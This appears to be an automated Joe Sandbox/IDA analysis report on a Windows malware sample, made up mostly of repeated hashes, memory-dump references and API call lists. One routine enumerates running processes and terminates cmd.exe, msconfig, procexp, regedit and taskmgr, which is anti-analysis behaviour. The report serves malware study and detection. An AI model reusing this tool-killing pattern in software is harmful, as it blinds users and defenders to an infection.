                                                                                                                            • Opcode ID: 81472c0f3449ab93b2418846ab4449d567b0c7ba93f645c2b3c65b12225d26aa
                                                                                                                            • Instruction ID: 1753c426f78cacfaa2a21b56c80e19fbcdf98715fe0f81e244ef27ef099ab1ce
                                                                                                                            • Opcode Fuzzy Hash: 81472c0f3449ab93b2418846ab4449d567b0c7ba93f645c2b3c65b12225d26aa
                                                                                                                            • Instruction Fuzzy Hash: 6F32CCB5E002189FDB18CFA9C981AAEBBBAFF88305F14856EE409A7345D7345E41CF54
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: X;C$=C
                                                                                                                            • API String ID: 0-3117722426
                                                                                                                            • Opcode ID: ab7ef5ead1ba021fc240500758cb51aa279bd5731aea722592ba2cbf6cdf8b28
                                                                                                                            • Instruction ID: 34d170cc2da6165733478edb2919f9704db3175d85021668ed0ed7e858c8bade
                                                                                                                            • Opcode Fuzzy Hash: ab7ef5ead1ba021fc240500758cb51aa279bd5731aea722592ba2cbf6cdf8b28
                                                                                                                            • Instruction Fuzzy Hash: 6E0208B1A093409FD364CF29C881B9BB7E5BFC9304F50892EE68DC7351EB7498458B96
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0=C$<C
                                                                                                                            • API String ID: 0-2166075456
                                                                                                                            • Opcode ID: 0e9e7faa1734838cdf3fcfd964466f3c1a14958dc91313a531cf17f56b592d4a
                                                                                                                            • Instruction ID: 3de3db98af5ee8465bf640654e8c60e704a675f0a343123add97231fc5765409
                                                                                                                            • Opcode Fuzzy Hash: 0e9e7faa1734838cdf3fcfd964466f3c1a14958dc91313a531cf17f56b592d4a
                                                                                                                            • Instruction Fuzzy Hash: 38A1C972A047049FD314CF6AD48165BF7E2BBC8714F148A3EF959C7381E6B8E8518B86
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \5C
                                                                                                                            • API String ID: 0-3607354458
                                                                                                                            • Opcode ID: c33e68c9777635af4b251fa118966882a2f2a63359a1434f468b53c0dbb94a12
                                                                                                                            • Instruction ID: 483e694452bb27de87d965050172cf41edfbae38b48850e5c2b478c31bb2b7e0
                                                                                                                            • Opcode Fuzzy Hash: c33e68c9777635af4b251fa118966882a2f2a63359a1434f468b53c0dbb94a12
                                                                                                                            • Instruction Fuzzy Hash: 5FC2EE77E007288BDB54CF9A988019DFBB7AFC8214F5E815AD858B7316C6B468468FC4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 1$P
                                                                                                                            • API String ID: 0-1080813287
                                                                                                                            • Opcode ID: bea9da46df65b63dd4d1821f5554e3179004f9199237be16b42902a5eff0747b
                                                                                                                            • Instruction ID: 93d1bc2c461382f9cc08b757c126f814a127e1c93f804cdbd031c1392e47c67d
                                                                                                                            • Opcode Fuzzy Hash: bea9da46df65b63dd4d1821f5554e3179004f9199237be16b42902a5eff0747b
                                                                                                                            • Instruction Fuzzy Hash: 98510636E041288FDB0DCEA5CCD1BEEB7B2FB81314F15922AC546AF680DB745842CB80
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 1$P
                                                                                                                            • API String ID: 0-1080813287
                                                                                                                            • Opcode ID: 23ca4a7d681df7e6057d8c1d85ffec7e1d5bd562aedea103cfc6c33edcf18fe2
                                                                                                                            • Instruction ID: 2db60a88def87a7542893f26fcf6580ee5a53b17307236b424a6cdd567dfc782
                                                                                                                            • Opcode Fuzzy Hash: 23ca4a7d681df7e6057d8c1d85ffec7e1d5bd562aedea103cfc6c33edcf18fe2
                                                                                                                            • Instruction Fuzzy Hash: 9341A532E052288FDB09CFA5CCD1BEDB7B2FB81318F155229D546AFA90D7745942CB80
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 1$P
                                                                                                                            • API String ID: 0-1080813287
                                                                                                                            • Opcode ID: d1dd456d30c4c9e063a1937159eaa9418de9403de5e286d1490124b71d34f05f
                                                                                                                            • Instruction ID: bce4fcb2c84f3397e59cbe5a0850cb3abd55c962395c7fc960b1389c7856aabc
                                                                                                                            • Opcode Fuzzy Hash: d1dd456d30c4c9e063a1937159eaa9418de9403de5e286d1490124b71d34f05f
                                                                                                                            • Instruction Fuzzy Hash: 7A41B432E442288FDB19CFE5CCD1BEDB7B2FB85314F15922ED506AB690D6746942CB80
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 1$P
                                                                                                                            • API String ID: 0-1080813287
                                                                                                                            • Opcode ID: 83d36623fe00e11d4c4af196a3436298b7ca19f0816b29787dcda342f2aa5a5a
                                                                                                                            • Instruction ID: 1d20fe0a109ed6a8b2dab82ab8f9311baf4349f3a11c88e39b8cde01f81cf2c7
                                                                                                                            • Opcode Fuzzy Hash: 83d36623fe00e11d4c4af196a3436298b7ca19f0816b29787dcda342f2aa5a5a
                                                                                                                            • Instruction Fuzzy Hash: 3F31C532A042288FDB19CEE4DCD1BEEB7B2FB81314F154219D506AB680D67869428B80
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: X>C
                                                                                                                            • API String ID: 0-872328525
                                                                                                                            • Opcode ID: a9b2c3ba3031ffee0b62830a26abfd6130e20520f53de3fee3baaef7cdc31a3c
                                                                                                                            • Instruction ID: c3536c3a1393b1149ada749e1c3c0169e858fcf798d8eeab66ce348d10dc4f2c
                                                                                                                            • Opcode Fuzzy Hash: a9b2c3ba3031ffee0b62830a26abfd6130e20520f53de3fee3baaef7cdc31a3c
                                                                                                                            • Instruction Fuzzy Hash: 07222671A093809FD374CF29C981B9BB7E6BFC9304F108A2EE58D97341EB7494458B96
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ce8203878696ad9bcdcd485d4f1f9806f044fa2872d65ccf8dbbdcba2d473ee6
                                                                                                                            • Instruction ID: 900f55d2b6e7019eb52847469dc98e95b1ec5b1925bdb09c5afad1bca5ad793e
                                                                                                                            • Opcode Fuzzy Hash: ce8203878696ad9bcdcd485d4f1f9806f044fa2872d65ccf8dbbdcba2d473ee6
                                                                                                                            • Instruction Fuzzy Hash: 14A180749057648FDB21CB24C8907A6FBF1AF4A210F0981DAD89D6B352D734AEC5CF52
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ffce78058ac926cf06762bc4e4b34f88e04511ecfc5932482d2ba3c38903d9e8
                                                                                                                            • Instruction ID: 3ae2defec410cd5336062e1e84e1c45304c100c1f12228fb05a803271bea89f2
                                                                                                                            • Opcode Fuzzy Hash: ffce78058ac926cf06762bc4e4b34f88e04511ecfc5932482d2ba3c38903d9e8
                                                                                                                            • Instruction Fuzzy Hash: 3E617DB2E102299BCF04DEB9C8415AEB7B5EFC4760F15832AFD28B7280D77499408B94
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: T;
                                                                                                                            • API String ID: 0-3742392016
                                                                                                                            • Opcode ID: 579dd89f5fd450efead43c3c5875c46775b66f5645cd8b2c137672e2d6772bb0
                                                                                                                            • Instruction ID: ca0934d56bf4c81895eef47e374fbc1da095972f9bc18505091418b2a9cca581
                                                                                                                            • Opcode Fuzzy Hash: 579dd89f5fd450efead43c3c5875c46775b66f5645cd8b2c137672e2d6772bb0
                                                                                                                            • Instruction Fuzzy Hash: 1C818B7AD107159BEB0E66B4CC5ABFF7A59FB81308F58963DA703EDCC2CA6845418281
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: T;
                                                                                                                            • API String ID: 0-3742392016
                                                                                                                            • Opcode ID: 0058d2dac413dcac02bc14987f0dbc515c1ca542b2daaa243f3bc90d9c0dc804
                                                                                                                            • Instruction ID: 1ed0fb39b5973ecb5e7f5cc662ac9cf6dffbe6dd1eae4005d8516cfdd6512336
                                                                                                                            • Opcode Fuzzy Hash: 0058d2dac413dcac02bc14987f0dbc515c1ca542b2daaa243f3bc90d9c0dc804
                                                                                                                            • Instruction Fuzzy Hash: 5E717D76D106159BEB0EA674CC9ABFF7659FBC1308F28953DE703EDC82CE6805418281
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 0042A9B3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: 22b9e1d720254fd6b4c4d0761b4a5d3f58e5ddf5931ca8531d83a89964cf516a
                                                                                                                            • Instruction ID: dbe11e59e199b027a4454e6b8806a57fd8da5023fa3fe12e4111a994b3c39e09
                                                                                                                            • Opcode Fuzzy Hash: 22b9e1d720254fd6b4c4d0761b4a5d3f58e5ddf5931ca8531d83a89964cf516a
                                                                                                                            • Instruction Fuzzy Hash: 339002A4751151478A0017716C5974565D05F4DF027D65861B501D4064DA654450951A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: T;
                                                                                                                            • API String ID: 0-3742392016
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: T;
                                                                                                                            • API String ID: 0-3742392016
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                              • Part of subcall function 003B1DD0: VirtualAlloc.KERNEL32(?,998B1F24), ref: 003B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocExitThreadUserVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3328890273-0
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004253FE), ref: 004276C7
                                                                                                                            • __mtterm.LIBCMT ref: 004276D3
                                                                                                                              • Part of subcall function 0042740C: DecodePointer.KERNEL32(00000004,00427835,?,004253FE), ref: 0042741D
                                                                                                                              • Part of subcall function 0042740C: TlsFree.KERNEL32(0000001D,00427835,?,004253FE), ref: 00427437
                                                                                                                              • Part of subcall function 0042740C: DeleteCriticalSection.KERNEL32(00000000,00000000,774EB15F,?,00427835,?,004253FE), ref: 0042A3A8
                                                                                                                              • Part of subcall function 0042740C: _free.LIBCMT ref: 0042A3AB
                                                                                                                              • Part of subcall function 0042740C: DeleteCriticalSection.KERNEL32(0000001D,774EB15F,?,00427835,?,004253FE), ref: 0042A3D2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,004253FE), ref: 004276E9
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,004253FE), ref: 004276F6
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,004253FE), ref: 00427703
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree,?,004253FE), ref: 00427710
                                                                                                                            • TlsAlloc.KERNEL32(?,004253FE), ref: 00427760
                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,004253FE), ref: 0042777B
                                                                                                                            • __init_pointers.LIBCMT ref: 00427785
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 00427796
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 004277A3
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 004277B0
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 004277BD
                                                                                                                            • DecodePointer.KERNEL32(00427590,?,004253FE), ref: 004277DE
                                                                                                                            • __calloc_crt.LIBCMT ref: 004277F3
                                                                                                                            • DecodePointer.KERNEL32(00000000,?,004253FE), ref: 0042780D
                                                                                                                            • GetCurrentThreadId.KERNEL32(?,004253FE), ref: 0042781F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                            • API String ID: 3698121176-3819984048
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: wcsstr$Process$_memset$CloseCurrentEnumExitFileHandleImageNameOpenProcessesSleepTerminateThread
                                                                                                                            • String ID: cmd.exe$msconfig$procexp$regedit$taskmgr
